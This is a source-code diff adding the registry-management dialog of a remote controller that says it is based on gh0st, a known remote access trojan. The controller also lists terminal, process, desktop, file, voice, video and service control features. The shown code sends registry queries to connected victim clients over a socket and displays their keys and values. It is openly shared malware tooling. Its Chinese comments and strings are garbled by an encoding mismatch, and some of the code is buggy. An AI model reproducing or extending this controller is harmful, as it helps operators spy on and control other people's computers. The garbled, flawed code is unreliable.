基于gh0st的远程控制器

实现了终端管理、进程管理、窗口管理、桌面管理、文件管理、语音管理、视频管理、服务管理、注册表管理等功能。

server/2015Remote/RegisterDlg.cpp

@@ -0,0 +1,306 @@
+// RegisterDlg.cpp : ʵ<><CAB5><EFBFBD>ļ<EFBFBD>
+//
+
+#include "stdafx.h"
+#include "2015Remote.h"
+#include "RegisterDlg.h"
+#include "afxdialogex.h"
+
+
+enum MYKEY{
+	MHKEY_CLASSES_ROOT,
+	MHKEY_CURRENT_USER,
+	MHKEY_LOCAL_MACHINE,
+	MHKEY_USERS,
+	MHKEY_CURRENT_CONFIG
+};
+enum KEYVALUE{
+	MREG_SZ,
+	MREG_DWORD,
+	MREG_BINARY,
+	MREG_EXPAND_SZ
+};
+
+// CRegisterDlg <20>Ի<EFBFBD><D4BB><EFBFBD>
+
+IMPLEMENT_DYNAMIC(CRegisterDlg, CDialog)
+
+
+CRegisterDlg::CRegisterDlg(CWnd* pParent,IOCPServer* IOCPServer, CONTEXT_OBJECT* ContextObject)
+	: CDialog(CRegisterDlg::IDD, pParent)
+{
+	m_iocpServer	= IOCPServer;
+	m_ContextObject	= ContextObject;
+}
+
+CRegisterDlg::~CRegisterDlg()
+{
+}
+
+void CRegisterDlg::DoDataExchange(CDataExchange* pDX)
+{
+	CDialog::DoDataExchange(pDX);
+	DDX_Control(pDX, IDC_TREE, m_Tree);
+	DDX_Control(pDX, IDC_LIST, m_ControlList);
+}
+
+
+BEGIN_MESSAGE_MAP(CRegisterDlg, CDialog)
+	ON_WM_CLOSE()
+	ON_NOTIFY(TVN_SELCHANGED, IDC_TREE, &CRegisterDlg::OnTvnSelchangedTree)
+END_MESSAGE_MAP()
+
+
+// CRegisterDlg <20><>Ϣ<EFBFBD><CFA2><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
+
+
+BOOL CRegisterDlg::OnInitDialog()
+{
+	CDialog::OnInitDialog();
+
+	// TODO:  <20>ڴ<EFBFBD><DAB4><EFBFBD><EFBFBD>Ӷ<EFBFBD><D3B6><EFBFBD><EFBFBD>ij<EFBFBD>ʼ<EFBFBD><CABC>
+
+	m_ImageListTree.Create(18, 18, ILC_COLOR16,10, 0);   //<2F><><EFBFBD><EFBFBD> <20><><EFBFBD>ؼ<EFBFBD><D8BC>ϵ<EFBFBD>ͼ<EFBFBD><CDBC>
+
+	m_hIcon = (HICON)::LoadImage(::AfxGetInstanceHandle(),MAKEINTRESOURCE(IDI_ICON_FATHER), IMAGE_ICON, 18, 18, 0);
+	m_ImageListTree.Add(m_hIcon);
+	m_hIcon = (HICON)::LoadImage(::AfxGetInstanceHandle(),MAKEINTRESOURCE(IDI_ICON_DIR), IMAGE_ICON, 18, 18, 0);
+	m_ImageListTree.Add(m_hIcon);
+
+	m_Tree.SetImageList(&m_ImageListTree,TVSIL_NORMAL);
+
+	m_hRoot = m_Tree.InsertItem("ע<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>",0,0,0,0);      //0
+	HKCU    = m_Tree.InsertItem("HKEY_CURRENT_USER",1,1,m_hRoot,0); //1
+	HKLM    = m_Tree.InsertItem("HKEY_LOCAL_MACHINE",1,1,m_hRoot,0);  
+	HKUS    = m_Tree.InsertItem("HKEY_USERS",1,1,m_hRoot,0);
+	HKCC    = m_Tree.InsertItem("HKEY_CURRENT_CONFIG",1,1,m_hRoot,0);
+	HKCR    = m_Tree.InsertItem("HKEY_CLASSES_ROOT",1,1,m_hRoot,0);
+
+	m_Tree.Expand(m_hRoot,TVE_EXPAND);
+
+	m_ControlList.InsertColumn(0,"<EFBFBD><EFBFBD><EFBFBD><EFBFBD>",LVCFMT_LEFT,150,-1);   
+	m_ControlList.InsertColumn(1,"<EFBFBD><EFBFBD><EFBFBD><EFBFBD>",LVCFMT_LEFT,60,-1);
+	m_ControlList.InsertColumn(2,"<EFBFBD><EFBFBD><EFBFBD><EFBFBD>",LVCFMT_LEFT,300,-1);
+	m_ControlList.SetExtendedStyle(LVS_EX_FULLROWSELECT);
+	//////<2F><><EFBFBD><EFBFBD>ͼ<EFBFBD><CDBC>//////
+	m_ImageListControlList.Create(16,16,TRUE,2,2);
+	m_ImageListControlList.Add(AfxGetApp()->LoadIcon(IDI_ICON_STRING));
+	m_ImageListControlList.Add(AfxGetApp()->LoadIcon(IDI_ICON_DWORD));
+	m_ControlList.SetImageList(&m_ImageListControlList,LVSIL_SMALL);
+
+	m_isEnable = TRUE;   //<2F><>ֵ<EFBFBD><D6B5>Ϊ<EFBFBD>˽<EFBFBD><CBBD><EFBFBD>Ƶ<EFBFBD><C6B5> <20>򱻿ض<F2B1BBBF><D8B6><EFBFBD><EFBFBD><EFBFBD>   
+
+	return TRUE;  // return TRUE unless you set the focus to a control
+	// <20>쳣: OCX <20><><EFBFBD><EFBFBD>ҳӦ<D2B3><D3A6><EFBFBD><EFBFBD> FALSE
+}
+
+
+void CRegisterDlg::OnClose()
+{
+	// TODO: <20>ڴ<EFBFBD><DAB4><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϣ<EFBFBD><CFA2><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>/<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ĭ<EFBFBD><C4AC>ֵ
+	m_ContextObject->v1 = 0;
+	CancelIo((HANDLE)m_ContextObject->sClientSocket);
+	closesocket(m_ContextObject->sClientSocket);
+	CDialog::OnClose();
+	delete this;
+}
+
+
+void CRegisterDlg::OnTvnSelchangedTree(NMHDR *pNMHDR, LRESULT *pResult)
+{
+	LPNMTREEVIEW pNMTreeView = reinterpret_cast<LPNMTREEVIEW>(pNMHDR);
+
+	if(!m_isEnable)	
+	{
+		return;
+	}
+	m_isEnable=FALSE;;
+
+	TVITEM Item = pNMTreeView->itemNew;
+
+	if(Item.hItem == m_hRoot)
+	{
+		m_isEnable=TRUE;;
+		return;
+	}
+
+	m_hSelectedItem=Item.hItem;			//<2F><><EFBFBD><EFBFBD><EFBFBD>û<EFBFBD><C3BB>򿪵<EFBFBD><F2BFAAB5><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ڵ<EFBFBD><DAB5><EFBFBD><EFBFBD><EFBFBD>   //0  1 2 2 3
+	m_ControlList.DeleteAllItems();
+
+	CString strFullPath=GetFullPath(m_hSelectedItem);    //<2F><><EFBFBD>ü<EFBFBD>ֵ·<D6B5><C2B7>  
+
+	char bToken=GetFatherPath(strFullPath);       //[2] \1\2\3
+	//<2F><><EFBFBD><EFBFBD>һ<EFBFBD><D2BB><EFBFBD><EFBFBD>
+	int nitem=m_ControlList.InsertItem(0,"(Ĭ<><C4AC>)",0);
+	m_ControlList.SetItemText(nitem,1,"REG_SZ");	
+	m_ControlList.SetItemText(nitem,2,"(<28><><EFBFBD><EFBFBD>δ<EFBFBD><CEB4><EFBFBD><EFBFBD>ֵ)");
+
+	strFullPath.Insert(0,bToken);//<2F><><EFBFBD><EFBFBD>  <20>Ǹ<EFBFBD><C7B8><EFBFBD><EFBFBD><EFBFBD>
+	bToken=COMMAND_REG_FIND;
+	strFullPath.Insert(0,bToken);      //<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ѯ<EFBFBD><D1AF><EFBFBD><EFBFBD>  [COMMAND_REG_FIND][x]
+
+	m_iocpServer->OnClientPreSending(m_ContextObject, (LPBYTE)(strFullPath.GetBuffer(0)), strFullPath.GetLength()+1);
+
+	m_isEnable = TRUE;
+
+	*pResult = 0;
+}
+
+CString CRegisterDlg::GetFullPath(HTREEITEM hCurrent)
+{
+	CString strTemp;
+	CString strReturn = "";
+	while(1)
+	{
+		if(hCurrent==m_hRoot)
+		{
+			return strReturn;
+		}
+		strTemp = m_Tree.GetItemText(hCurrent);  
+		if(strTemp.Right(1) != "\\")
+			strTemp += "\\";
+		strReturn = strTemp  + strReturn;
+		hCurrent = m_Tree.GetParentItem(hCurrent);   //<2F>õ<EFBFBD><C3B5><EFBFBD><EFBFBD><EFBFBD>
+
+	}
+	return strReturn;
+}
+
+char CRegisterDlg::GetFatherPath(CString& strFullPath)
+{
+	char bToken;
+	if(!strFullPath.Find("HKEY_CLASSES_ROOT"))	//<2F>ж<EFBFBD><D0B6><EFBFBD><EFBFBD><EFBFBD>
+	{
+
+		bToken=MHKEY_CLASSES_ROOT;
+		strFullPath.Delete(0,sizeof("HKEY_CLASSES_ROOT"));
+	}else if(!strFullPath.Find("HKEY_CURRENT_USER"))
+	{
+		bToken=MHKEY_CURRENT_USER;
+		strFullPath.Delete(0,sizeof("HKEY_CURRENT_USER"));
+
+	}else if(!strFullPath.Find("HKEY_LOCAL_MACHINE"))
+	{
+		bToken=MHKEY_LOCAL_MACHINE;
+		strFullPath.Delete(0,sizeof("HKEY_LOCAL_MACHINE"));
+
+	}else if(!strFullPath.Find("HKEY_USERS"))
+	{
+		bToken=MHKEY_USERS;
+		strFullPath.Delete(0,sizeof("HKEY_USERS"));
+
+	}else if(!strFullPath.Find("HKEY_CURRENT_CONFIG"))
+	{
+		bToken=MHKEY_CURRENT_CONFIG;
+		strFullPath.Delete(0,sizeof("HKEY_CURRENT_CONFIG"));
+
+	}
+	return bToken;
+}
+
+
+void CRegisterDlg::OnReceiveComplete(void)
+{
+	switch (m_ContextObject->InDeCompressedBuffer.GetBuffer(0)[0])
+	{
+
+	case TOKEN_REG_PATH:
+		{
+			AddPath((char*)(m_ContextObject->InDeCompressedBuffer.GetBuffer(1)));
+			break;
+		}
+
+	case TOKEN_REG_KEY:
+		{
+			AddKey((char*)(m_ContextObject->InDeCompressedBuffer.GetBuffer(1)));
+			break;
+		}
+
+	default:
+		// <20><><EFBFBD>䷢<EFBFBD><E4B7A2><EFBFBD>쳣<EFBFBD><ECB3A3><EFBFBD><EFBFBD>
+		break;
+	}
+}
+
+
+struct REGMSG{
+	int count;         //<2F><><EFBFBD>ָ<EFBFBD><D6B8><EFBFBD>
+	DWORD size;             //<2F><><EFBFBD>ִ<EFBFBD>С
+	DWORD valsize;     //ֵ<><D6B5>С
+};
+
+
+void CRegisterDlg::AddPath(char* szBuffer)
+{
+	if(szBuffer==NULL) return;
+	int msgsize=sizeof(REGMSG);
+	REGMSG msg;
+	memcpy((void*)&msg,szBuffer,msgsize);
+	DWORD size =msg.size;
+	int count=msg.count;
+
+	if(size>0&&count>0){                   //һ<>㱣<EFBFBD><E3B1A3><EFBFBD><EFBFBD>ʩ
+		for(int i=0;i<count;i++){
+			char* szKeyName=szBuffer+size*i+msgsize;
+			m_Tree.InsertItem(szKeyName,1,1,m_hSelectedItem,0);//<2F><><EFBFBD><EFBFBD><EFBFBD>Ӽ<EFBFBD><D3BC><EFBFBD><EFBFBD><EFBFBD>
+			m_Tree.Expand(m_hSelectedItem,TVE_EXPAND);
+		}
+	}
+}
+
+void CRegisterDlg::AddKey(char* szBuffer)
+{
+	m_ControlList.DeleteAllItems();
+	int iItem=m_ControlList.InsertItem(0,"(Data)",0);
+	m_ControlList.SetItemText(iItem,1,"REG_SZ");	
+	m_ControlList.SetItemText(iItem,2,"(NULL)");
+
+	if(szBuffer==NULL) return;
+	REGMSG msg;
+	memcpy((void*)&msg,szBuffer,sizeof(msg));
+	char* szTemp=szBuffer+sizeof(msg);  
+	for(int i=0;i<msg.count;i++)
+	{
+		BYTE Type=szTemp[0];   //<2F><><EFBFBD><EFBFBD>
+		szTemp+=sizeof(BYTE);
+		char* szValueName=szTemp;   //ȡ<><C8A1><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
+		szTemp+=msg.size;
+		BYTE* szValueDate=(BYTE*)szTemp;      //ȡ<><C8A1>ֵ
+		szTemp+=msg.valsize;
+		if(Type==MREG_SZ)
+		{
+			int iItem=m_ControlList.InsertItem(0,szValueName,0);
+			m_ControlList.SetItemText(iItem,1,"REG_SZ");	
+			m_ControlList.SetItemText(iItem,2,(char*)szValueDate);
+		}
+		if(Type==MREG_DWORD)
+		{
+			char ValueDate[256];
+			DWORD d=(DWORD)szValueDate;
+			memcpy((void*)&d,szValueDate,sizeof(DWORD));
+			CString strValue;
+			strValue.Format("0x%x",d);
+			sprintf(ValueDate,"  (%wd)",d);
+			strValue+=" ";
+			strValue+=ValueDate;
+			int iItem=m_ControlList.InsertItem(0,szValueName,1);
+			m_ControlList.SetItemText(iItem,1,"REG_DWORD");	
+			m_ControlList.SetItemText(iItem,2,strValue);
+		}
+		if(Type==MREG_BINARY)
+		{
+			char ValueDate[256];
+			sprintf(ValueDate,"%wd",szValueDate);
+
+			int iItem=m_ControlList.InsertItem(0,szValueName,1);
+			m_ControlList.SetItemText(iItem,1,"REG_BINARY");	
+			m_ControlList.SetItemText(iItem,2,ValueDate);
+		}
+		if(Type==MREG_EXPAND_SZ)
+		{
+			int iItem=m_ControlList.InsertItem(0,szValueName,0);
+			m_ControlList.SetItemText(iItem,1,"REG_EXPAND_SZ");	
+			m_ControlList.SetItemText(iItem,2,(char*)szValueDate);
+		}
+	}
+}